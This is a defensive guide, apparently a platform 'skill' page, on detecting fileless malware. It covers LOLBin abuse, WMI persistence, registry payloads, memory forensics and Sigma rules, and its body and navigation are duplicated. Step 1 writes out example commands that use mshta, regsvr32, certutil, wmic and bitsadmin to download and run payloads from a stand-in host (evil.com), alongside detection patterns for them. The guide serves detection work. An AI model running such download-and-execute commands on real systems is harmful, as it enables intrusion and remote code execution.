Detecting Fileless Malware Techniques

When to Use

EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
Investigating attacks that leave no traditional malware files on disk
Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
Memory forensics reveals malicious code but no corresponding files exist on the filesystem

Do not use for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

Prerequisites

Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
PowerShell Script Block Logging and Module Logging enabled
Volatility 3 for memory forensics of fileless malware artifacts
Process Monitor (ProcMon) for real-time system activity monitoring
Windows Event Log access with adequate retention policies
Autoruns for identifying persistence mechanisms

Workflow

Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
  Detect: mshta.exe with URL argument or vbscript: prefix

regsvr32.exe:
  Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
  Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
  Detect: regsvr32.exe with /i: URL parameter

certutil.exe:
  Abuse: Download files, decode Base64
  Example: certutil -urlcache -split -f http://evil.com/payload.exe
  Example: certutil -decode encoded.txt payload.exe
  Detect: certutil.exe with -urlcache or -decode arguments

rundll32.exe:
  Abuse: Execute DLL functions, JavaScript
  Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
  Detect: rundll32.exe with javascript: argument

wmic.exe:
  Abuse: Execute code via XSL stylesheets
  Example: wmic process get brief /format:"http://evil.com/payload.xsl"
  Detect: wmic.exe with /format: URL parameter

bitsadmin.exe:
  Abuse: Download files via BITS
  Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
  Detect: bitsadmin.exe with /transfer or /addfile to external URL

cmstp.exe:
  Abuse: Execute commands via INF file
  Example: cmstp.exe /ni /s payload.inf
  Detect: cmstp.exe execution from non-standard locations

Step 2: Detect WMI-Based Persistence

Analyze WMI event subscriptions used for fileless persistence:

# List WMI event subscriptions (filters, consumers, bindings)
wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list

# PowerShell enumeration of WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

# Parse Sysmon WMI events (Event IDs 19, 20, 21)
import subprocess
import xml.etree.ElementTree as ET

# WMI Event Filter creation (EID 19)
result = subprocess.run(
    ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
     "/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"],
    capture_output=True, text=True
)

ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
for event_xml in result.stdout.split("</Event>"):
    if not event_xml.strip():
        continue
    try:
        root = ET.fromstring(event_xml + "</Event>")
        eid = root.find(".//e:System/e:EventID", ns).text
        data = {}
        for d in root.findall(".//e:EventData/e:Data", ns):
            data[d.get("Name")] = d.text

        if eid == "19":
            print(f"[!] WMI Filter Created: {data.get('Name')}")
            print(f"    Query: {data.get('Query')}")
        elif eid == "20":
            print(f"[!] WMI Consumer Created: {data.get('Name')}")
            print(f"    Type: {data.get('Type')}")
            print(f"    Destination: {data.get('Destination')}")
        elif eid == "21":
            print(f"[!] WMI Binding Created")
            print(f"    Consumer: {data.get('Consumer')}")
            print(f"    Filter: {data.get('Filter')}")
    except:
        pass

Step 3: Detect Registry-Resident Payloads

Find malicious code stored in the Windows Registry:

# Common registry locations for fileless payloads
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKCU\Environment" /s

# Check for PowerShell encoded commands in registry values
# Malware stores Base64-encoded payloads in custom registry keys
reg query "HKCU\Software" /s /f "powershell" 2>nul
reg query "HKCU\Software" /s /f "-enc" 2>nul

# Check for large registry values (possible stored payloads)
python3 << 'PYEOF'
import winreg
import base64

suspicious_keys = [
    (winreg.HKEY_CURRENT_USER, r"Software"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software"),
]

def scan_registry(hive, path, depth=0):
    if depth > 3:
        return
    try:
        key = winreg.OpenKey(hive, path)
        i = 0
        while True:
            try:
                name, value, vtype = winreg.EnumValue(key, i)
                if isinstance(value, str) and len(value) > 500:
                    # Check for Base64-encoded content
                    try:
                        decoded = base64.b64decode(value[:100])
                        print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)")
                    except:
                        pass
                    # Check for PowerShell keywords
                    if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]):
                        print(f"[!] PowerShell in registry: {path}\\{name}")
                i += 1
            except WindowsError:
                break
        # Recurse into subkeys
        j = 0
        while True:
            try:
                subkey = winreg.EnumKey(key, j)
                scan_registry(hive, f"{path}\\{subkey}", depth + 1)
                j += 1
            except WindowsError:
                break
    except:
        pass

for hive, path in suspicious_keys:
    scan_registry(hive, path)
PYEOF

Step 4: Analyze Memory for Fileless Artifacts

Use memory forensics to find in-memory-only malware:

# Process with injected code (no backing file)
vol3 -f memory.dmp windows.malfind

# Check for .NET assemblies loaded from memory (not from disk files)
vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"

# PowerShell CLR usage (indicates .NET reflection loading)
vol3 -f memory.dmp windows.cmdline | grep -i "powershell"

# Scan for known fileless frameworks
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "
rule Fileless_PowerShell {
    strings:
        \$s1 = \"System.Reflection.Assembly\" ascii wide
        \$s2 = \"[System.Convert]::FromBase64String\" ascii wide
        \$s3 = \"Invoke-Expression\" ascii wide
        \$s4 = \"DownloadString\" ascii wide
    condition:
        2 of them
}
"

# Extract PowerShell command history from memory
vol3 -f memory.dmp windows.cmdline
strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-encodedcommand"

Step 5: Build Comprehensive Detection Rules

Create detection content for fileless techniques:

# Sigma rule: LOLBin execution with network activity
title: Suspicious LOLBin Execution with Network Arguments
logsource:
    category: process_creation
    product: windows
detection:
    selection_mshta:
        Image|endswith: '\mshta.exe'
        CommandLine|contains:
            - 'http'
            - 'vbscript:'
            - 'javascript:'
    selection_certutil:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
            - '-urlcache'
            - '-decode'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains: '/i:http'
    selection_wmic:
        Image|endswith: '\wmic.exe'
        CommandLine|contains: '/format:http'
    condition: selection_mshta or selection_certutil or selection_regsvr32 or selection_wmic
level: high

# Sigma rule: WMI persistence creation
title: WMI Event Subscription for Persistence
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID:
            - 19  # WMI EventFilter
            - 20  # WMI EventConsumer
            - 21  # WMI FilterConsumerBinding
    condition: selection
level: medium

Step 6: Document Fileless Attack Chain

Map the complete fileless attack lifecycle:

Typical Fileless Attack Chain:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Phase 1 - Initial Access:
  Email -> Macro -> mshta.exe/PowerShell (LOLBin abuse)
  OR Web exploit -> regsvr32/certutil (scriptlet download)

Phase 2 - Execution:
  PowerShell downloads and executes script in memory
  .NET Assembly.Load() for reflective loading
  WMI process creation for lateral movement

Phase 3 - Persistence:
  WMI event subscription (survives reboots)
  Registry-stored encoded payload (loaded by Run key)
  Scheduled task executing inline PowerShell

Phase 4 - Privilege Escalation:
  PowerShell with Invoke-Mimikatz (in-memory credential theft)
  Named pipe impersonation via WMI

Phase 5 - Lateral Movement:
  WMI remote process creation (no file transfer needed)
  PowerShell remoting (WinRM)
  PsExec via WMI

Phase 6 - Exfiltration:
  PowerShell HTTP POST to C2
  DNS tunneling via Invoke-DNSExfiltration
  Cloud storage API (OneDrive, Google Drive)

Key Concepts

Term	Definition
Fileless Malware	Malware operating entirely in memory or within legitimate system tools without creating traditional executable files on disk
LOLBins (Living Off the Land Binaries)	Legitimate system binaries (mshta, regsvr32, certutil) abused by attackers to execute malicious code while evading application whitelisting
WMI Event Subscription	Windows Management Instrumentation persistence mechanism using event filters, consumers, and bindings to execute code on system events
Registry-Resident Payload	Malicious code stored as encoded data in Windows Registry values, loaded and executed by a small stub in a Run key
Reflective Loading	Loading .NET assemblies or PE files from byte arrays in memory using Assembly.Load() without writing to disk
In-Memory Execution	Running code directly in RAM without creating files, leveraging process injection, reflective loading, or script interpreters
Script Block Logging	Windows PowerShell logging feature (Event ID 4104) that captures script content after deobfuscation, essential for fileless threat visibility

Tools & Systems

Sysmon: System Monitor providing detailed event logging for process creation, WMI events, registry changes, and network connections
Autoruns: Sysinternals tool showing all auto-start locations including WMI subscriptions, scheduled tasks, and registry entries
Volatility: Memory forensics framework for detecting in-memory code, injected processes, and fileless malware artifacts
Process Monitor: Real-time monitoring of file system, registry, and process activity for observing fileless attack behavior
LOLBAS Project: Community-documented catalog of LOLBin abuse techniques at https://lolbas-project.github.io/

Common Scenarios

Scenario: Investigating a Fileless Attack Using WMI Persistence

Context: Sysmon alerts show WMI event subscription creation followed by periodic PowerShell execution without any corresponding malware files on disk. The attack persists across reboots.

Approach:

Query WMI namespace for event filters, consumers, and bindings to identify the persistence mechanism
Extract the CommandLineEventConsumer or ActiveScriptEventConsumer payload
Decode the PowerShell command (typically Base64-encoded with -enc flag)
Trace the PowerShell execution in Script Block Logging (Event ID 4104) for the full deobfuscated payload
Analyze memory dump for reflectively loaded assemblies and injected code
Check registry for additional stored payloads referenced by the PowerShell script
Map the complete attack chain from initial access through persistence and lateral movement

Pitfalls:

Not having Sysmon WMI event logging enabled (Events 19/20/21) before the incident
Rebooting the system before capturing a memory dump (destroys in-memory evidence)
Focusing only on file-based IOCs when the attack is entirely fileless
Missing the initial access vector because the LOLBin execution left minimal traces

Output Format

FILELESS MALWARE ANALYSIS REPORT
===================================
Incident:         INC-2025-2847
Attack Type:      Fileless (no malware files on disk)

INITIAL ACCESS
Vector:           Phishing email with macro-enabled document
LOLBin Chain:     WINWORD.EXE -> mshta.exe -> powershell.exe

PERSISTENCE MECHANISM
Type:             WMI Event Subscription
Filter Name:      WindowsUpdateCheck
Filter Query:     SELECT * FROM __InstanceModificationEvent WITHIN 300
                  WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
Consumer:         CommandLineEventConsumer
Command:          powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...

DECODED PAYLOAD
[Layer 1] Base64 UTF-16LE decode
[Layer 2] AMSI bypass + Assembly.Load() of embedded .NET payload
[Layer 3] .NET RAT with C2 communication to 185.220.101[.]42

REGISTRY PAYLOADS
HKCU\Software\AppDataLow\Config\data = [Base64 encoded .NET assembly, 247KB]
Loaded by: PowerShell WMI consumer script

MEMORY ARTIFACTS
PID 4012 (powershell.exe): Injected .NET assembly at 0x00400000
  - CobaltStrike beacon detected via YARA
  - C2: hxxps://185.220.101[.]42/updates

EXTRACTED IOCs
C2 IP:            185.220.101[.]42
WMI Filter:       WindowsUpdateCheck
Registry Path:    HKCU\Software\AppDataLow\Config\data
PowerShell Flags: -nop -w hidden -enc

MITRE ATT&CK
T1059.001  PowerShell
T1546.003  WMI Event Subscription
T1218.005  Mshta
T1112      Modify Registry
T1055.012  Process Hollowing

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC7.2 (Anomaly Detection), CC7.4 (Incident Response)
ISO 27001: A.12.2 (Malware Protection), A.16.1 (Security Incident Management)
NIST 800-53: SI-3 (Malicious Code Protection), IR-4 (Incident Handling)
NIST CSF: DE.CM (Continuous Monitoring), RS.AN (Analysis)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add detecting-fileless-malware-techniques

# Or load dynamically via MCP
grc.load_skill("detecting-fileless-malware-techniques")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Detecting Fileless Malware Techniques

When to Use

EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
Investigating attacks that leave no traditional malware files on disk
Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
Memory forensics reveals malicious code but no corresponding files exist on the filesystem

Do not use for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

Prerequisites

Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
PowerShell Script Block Logging and Module Logging enabled
Volatility 3 for memory forensics of fileless malware artifacts
Process Monitor (ProcMon) for real-time system activity monitoring
Windows Event Log access with adequate retention policies
Autoruns for identifying persistence mechanisms

Workflow

Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
  Detect: mshta.exe with URL argument or vbscript: prefix

regsvr32.exe:
  Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
  Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
  Detect: regsvr32.exe with /i: URL parameter

certutil.exe:
  Abuse: Download files, decode Base64
  Example: certutil -urlcache -split -f http://evil.com/payload.exe
  Example: certutil -decode encoded.txt payload.exe
  Detect: certutil.exe with -urlcache or -decode arguments

rundll32.exe:
  Abuse: Execute DLL functions, JavaScript
  Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
  Detect: rundll32.exe with javascript: argument

wmic.exe:
  Abuse: Execute code via XSL stylesheets
  Example: wmic process get brief /format:"http://evil.com/payload.xsl"
  Detect: wmic.exe with /format: URL parameter

bitsadmin.exe:
  Abuse: Download files via BITS
  Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
  Detect: bitsadmin.exe with /transfer or /addfile to external URL

cmstp.exe:
  Abuse: Execute commands via INF file
  Example: cmstp.exe /ni /s payload.inf
  Detect: cmstp.exe execution from non-standard locations

Step 2: Detect WMI-Based Persistence

Analyze WMI event subscriptions used for fileless persistence:

# List WMI event subscriptions (filters, consumers, bindings)
wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list

# PowerShell enumeration of WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

# Parse Sysmon WMI events (Event IDs 19, 20, 21)
import subprocess
import xml.etree.ElementTree as ET

# WMI Event Filter creation (EID 19)
result = subprocess.run(
    ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
     "/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"],
    capture_output=True, text=True
)

ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
for event_xml in result.stdout.split("</Event>"):
    if not event_xml.strip():
        continue
    try:
        root = ET.fromstring(event_xml + "</Event>")
        eid = root.find(".//e:System/e:EventID", ns).text
        data = {}
        for d in root.findall(".//e:EventData/e:Data", ns):
            data[d.get("Name")] = d.text

        if eid == "19":
            print(f"[!] WMI Filter Created: {data.get('Name')}")
            print(f"    Query: {data.get('Query')}")
        elif eid == "20":
            print(f"[!] WMI Consumer Created: {data.get('Name')}")
            print(f"    Type: {data.get('Type')}")
            print(f"    Destination: {data.get('Destination')}")
        elif eid == "21":
            print(f"[!] WMI Binding Created")
            print(f"    Consumer: {data.get('Consumer')}")
            print(f"    Filter: {data.get('Filter')}")
    except:
        pass

Step 3: Detect Registry-Resident Payloads

Find malicious code stored in the Windows Registry:

# Common registry locations for fileless payloads
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKCU\Environment" /s

# Check for PowerShell encoded commands in registry values
# Malware stores Base64-encoded payloads in custom registry keys
reg query "HKCU\Software" /s /f "powershell" 2>nul
reg query "HKCU\Software" /s /f "-enc" 2>nul

# Check for large registry values (possible stored payloads)
python3 << 'PYEOF'
import winreg
import base64

suspicious_keys = [
    (winreg.HKEY_CURRENT_USER, r"Software"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software"),
]

def scan_registry(hive, path, depth=0):
    if depth > 3:
        return
    try:
        key = winreg.OpenKey(hive, path)
        i = 0
        while True:
            try:
                name, value, vtype = winreg.EnumValue(key, i)
                if isinstance(value, str) and len(value) > 500:
                    # Check for Base64-encoded content
                    try:
                        decoded = base64.b64decode(value[:100])
                        print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)")
                    except:
                        pass
                    # Check for PowerShell keywords
                    if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]):
                        print(f"[!] PowerShell in registry: {path}\\{name}")
                i += 1
            except WindowsError:
                break
        # Recurse into subkeys
        j = 0
        while True:
            try:
                subkey = winreg.EnumKey(key, j)
                scan_registry(hive, f"{path}\\{subkey}", depth + 1)
                j += 1
            except WindowsError:
                break
    except:
        pass

for hive, path in suspicious_keys:
    scan_registry(hive, path)
PYEOF

Step 4: Analyze Memory for Fileless Artifacts

Use memory forensics to find in-memory-only malware:

# Process with injected code (no backing file)
vol3 -f memory.dmp windows.malfind

# Check for .NET assemblies loaded from memory (not from disk files)
vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"

# PowerShell CLR usage (indicates .NET reflection loading)
vol3 -f memory.dmp windows.cmdline | grep -i "powershell"

# Scan for known fileless frameworks
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "
rule Fileless_PowerShell {
    strings:
        \$s1 = \"System.Reflection.Assembly\" ascii wide
        \$s2 = \"[System.Convert]::FromBase64String\" ascii wide
        \$s3 = \"Invoke-Expression\" ascii wide
        \$s4 = \"DownloadString\" ascii wide
    condition:
        2 of them
}
"

# Extract PowerShell command history from memory
vol3 -f memory.dmp windows.cmdline
strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-encodedcommand"

Step 5: Build Comprehensive Detection Rules

Create detection content for fileless techniques:

# Sigma rule: LOLBin execution with network activity
title: Suspicious LOLBin Execution with Network Arguments
logsource:
    category: process_creation
    product: windows
detection:
    selection_mshta:
        Image|endswith: '\mshta.exe'
        CommandLine|contains:
            - 'http'
            - 'vbscript:'
            - 'javascript:'
    selection_certutil:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
            - '-urlcache'
            - '-decode'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains: '/i:http'
    selection_wmic:
        Image|endswith: '\wmic.exe'
        CommandLine|contains: '/format:http'
    condition: selection_mshta or selection_certutil or selection_regsvr32 or selection_wmic
level: high

# Sigma rule: WMI persistence creation
title: WMI Event Subscription for Persistence
logsource:
    product: windows
    service: sysmon
detection:
    selection:
        EventID:
            - 19  # WMI EventFilter
            - 20  # WMI EventConsumer
            - 21  # WMI FilterConsumerBinding
    condition: selection
level: medium

Step 6: Document Fileless Attack Chain

Map the complete fileless attack lifecycle:

Typical Fileless Attack Chain:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Phase 1 - Initial Access:
  Email -> Macro -> mshta.exe/PowerShell (LOLBin abuse)
  OR Web exploit -> regsvr32/certutil (scriptlet download)

Phase 2 - Execution:
  PowerShell downloads and executes script in memory
  .NET Assembly.Load() for reflective loading
  WMI process creation for lateral movement

Phase 3 - Persistence:
  WMI event subscription (survives reboots)
  Registry-stored encoded payload (loaded by Run key)
  Scheduled task executing inline PowerShell

Phase 4 - Privilege Escalation:
  PowerShell with Invoke-Mimikatz (in-memory credential theft)
  Named pipe impersonation via WMI

Phase 5 - Lateral Movement:
  WMI remote process creation (no file transfer needed)
  PowerShell remoting (WinRM)
  PsExec via WMI

Phase 6 - Exfiltration:
  PowerShell HTTP POST to C2
  DNS tunneling via Invoke-DNSExfiltration
  Cloud storage API (OneDrive, Google Drive)

Key Concepts

Term	Definition
Fileless Malware	Malware operating entirely in memory or within legitimate system tools without creating traditional executable files on disk
LOLBins (Living Off the Land Binaries)	Legitimate system binaries (mshta, regsvr32, certutil) abused by attackers to execute malicious code while evading application whitelisting
WMI Event Subscription	Windows Management Instrumentation persistence mechanism using event filters, consumers, and bindings to execute code on system events
Registry-Resident Payload	Malicious code stored as encoded data in Windows Registry values, loaded and executed by a small stub in a Run key
Reflective Loading	Loading .NET assemblies or PE files from byte arrays in memory using Assembly.Load() without writing to disk
In-Memory Execution	Running code directly in RAM without creating files, leveraging process injection, reflective loading, or script interpreters
Script Block Logging	Windows PowerShell logging feature (Event ID 4104) that captures script content after deobfuscation, essential for fileless threat visibility

Tools & Systems

Sysmon: System Monitor providing detailed event logging for process creation, WMI events, registry changes, and network connections
Autoruns: Sysinternals tool showing all auto-start locations including WMI subscriptions, scheduled tasks, and registry entries
Volatility: Memory forensics framework for detecting in-memory code, injected processes, and fileless malware artifacts
Process Monitor: Real-time monitoring of file system, registry, and process activity for observing fileless attack behavior
LOLBAS Project: Community-documented catalog of LOLBin abuse techniques at https://lolbas-project.github.io/

Common Scenarios

Scenario: Investigating a Fileless Attack Using WMI Persistence

Context: Sysmon alerts show WMI event subscription creation followed by periodic PowerShell execution without any corresponding malware files on disk. The attack persists across reboots.

Approach:

Query WMI namespace for event filters, consumers, and bindings to identify the persistence mechanism
Extract the CommandLineEventConsumer or ActiveScriptEventConsumer payload
Decode the PowerShell command (typically Base64-encoded with -enc flag)
Trace the PowerShell execution in Script Block Logging (Event ID 4104) for the full deobfuscated payload
Analyze memory dump for reflectively loaded assemblies and injected code
Check registry for additional stored payloads referenced by the PowerShell script
Map the complete attack chain from initial access through persistence and lateral movement

Pitfalls:

Not having Sysmon WMI event logging enabled (Events 19/20/21) before the incident
Rebooting the system before capturing a memory dump (destroys in-memory evidence)
Focusing only on file-based IOCs when the attack is entirely fileless
Missing the initial access vector because the LOLBin execution left minimal traces

Output Format

FILELESS MALWARE ANALYSIS REPORT
===================================
Incident:         INC-2025-2847
Attack Type:      Fileless (no malware files on disk)

INITIAL ACCESS
Vector:           Phishing email with macro-enabled document
LOLBin Chain:     WINWORD.EXE -> mshta.exe -> powershell.exe

PERSISTENCE MECHANISM
Type:             WMI Event Subscription
Filter Name:      WindowsUpdateCheck
Filter Query:     SELECT * FROM __InstanceModificationEvent WITHIN 300
                  WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
Consumer:         CommandLineEventConsumer
Command:          powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...

DECODED PAYLOAD
[Layer 1] Base64 UTF-16LE decode
[Layer 2] AMSI bypass + Assembly.Load() of embedded .NET payload
[Layer 3] .NET RAT with C2 communication to 185.220.101[.]42

REGISTRY PAYLOADS
HKCU\Software\AppDataLow\Config\data = [Base64 encoded .NET assembly, 247KB]
Loaded by: PowerShell WMI consumer script

MEMORY ARTIFACTS
PID 4012 (powershell.exe): Injected .NET assembly at 0x00400000
  - CobaltStrike beacon detected via YARA
  - C2: hxxps://185.220.101[.]42/updates

EXTRACTED IOCs
C2 IP:            185.220.101[.]42
WMI Filter:       WindowsUpdateCheck
Registry Path:    HKCU\Software\AppDataLow\Config\data
PowerShell Flags: -nop -w hidden -enc

MITRE ATT&CK
T1059.001  PowerShell
T1546.003  WMI Event Subscription
T1218.005  Mshta
T1112      Modify Registry
T1055.012  Process Hollowing

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC7.2 (Anomaly Detection), CC7.4 (Incident Response)
ISO 27001: A.12.2 (Malware Protection), A.16.1 (Security Incident Management)
NIST 800-53: SI-3 (Malicious Code Protection), IR-4 (Incident Handling)
NIST CSF: DE.CM (Continuous Monitoring), RS.AN (Analysis)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add detecting-fileless-malware-techniques

# Or load dynamically via MCP
grc.load_skill("detecting-fileless-malware-techniques")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Prerequisites

Detecting Fileless Malware Techniques

When to Use

Prerequisites

Workflow

Step 1: Identify LOLBin Usage

Step 2: Detect WMI-Based Persistence

Step 3: Detect Registry-Resident Payloads

Step 4: Analyze Memory for Fileless Artifacts

Step 5: Build Comprehensive Detection Rules

Step 6: Document Fileless Attack Chain

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Investigating a Fileless Attack Using WMI Persistence

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Detecting Process Injection Techniques

Extracting Iocs from Malware Samples

Detecting Rootkit Activity

Analyzing Macro Malware in Office Documents

Analyzing Malware Behavior with Cuckoo Sandbox

Analyzing Network Traffic of Malware

Prerequisites

Detecting Fileless Malware Techniques

When to Use

Prerequisites

Workflow

Step 1: Identify LOLBin Usage

Step 2: Detect WMI-Based Persistence

Step 3: Detect Registry-Resident Payloads

Step 4: Analyze Memory for Fileless Artifacts

Step 5: Build Comprehensive Detection Rules

Step 6: Document Fileless Attack Chain

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Investigating a Fileless Attack Using WMI Persistence

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Detecting Process Injection Techniques

Extracting Iocs from Malware Samples

Detecting Rootkit Activity

Analyzing Macro Malware in Office Documents

Analyzing Malware Behavior with Cuckoo Sandbox

Analyzing Network Traffic of Malware